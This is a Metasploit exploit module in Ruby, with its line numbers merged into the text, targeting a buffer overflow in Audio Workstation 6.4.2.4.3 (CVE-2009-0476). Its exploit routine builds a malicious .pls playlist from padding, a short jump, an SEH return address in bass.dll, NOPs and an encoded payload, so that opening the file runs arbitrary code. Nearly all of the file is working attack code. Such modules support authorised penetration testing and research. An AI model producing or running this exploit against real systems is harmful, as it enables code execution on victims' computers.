Path: blob/master/modules/exploits/windows/fileformat/audio_wkstn_pls.rb
19513 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.18When opening a malicious pls file with the Audio Workstation,19a remote attacker could overflow a buffer and execute20arbitrary code.21},22'License' => MSF_LICENSE,23'Author' => [ 'germaya_x', 'dookie', ],24'References' => [25[ 'CVE', '2009-0476' ],26[ 'OSVDB', '55424' ],27[ 'EDB', '10353' ],28],29'DefaultOptions' => {30'EXITFUNC' => 'seh',31'DisablePayloadHandler' => true,32'AllowWin32SEH' => true33},34'Payload' => {35'Space' => 4100,36'BadChars' => "\x00",37'StackAdjustment' => -3500,38'EncoderType' => Msf::Encoder::Type::AlphanumUpper,39'DisableNops' => true,40},41'Platform' => 'win',42'Targets' => [43[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll44],45'Privileged' => false,46'DisclosureDate' => '2009-12-08',47'DefaultTarget' => 0,48'Notes' => {49'Reliability' => UNKNOWN_RELIABILITY,50'Stability' => UNKNOWN_STABILITY,51'SideEffects' => UNKNOWN_SIDE_EFFECTS52}53)54)5556register_options(57[58OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),59]60)61end6263def exploit64sploit = rand_text_alpha_upper(1308)65sploit << "\xeb\x16\x90\x90"66sploit << [target.ret].pack('V')67sploit << make_nops(32)68sploit << payload.encoded69sploit << rand_text_alpha_upper(4652 - payload.encoded.length)7071print_status("Creating '#{datastore['FILENAME']}' file ...")72file_create(sploit)73end74end757677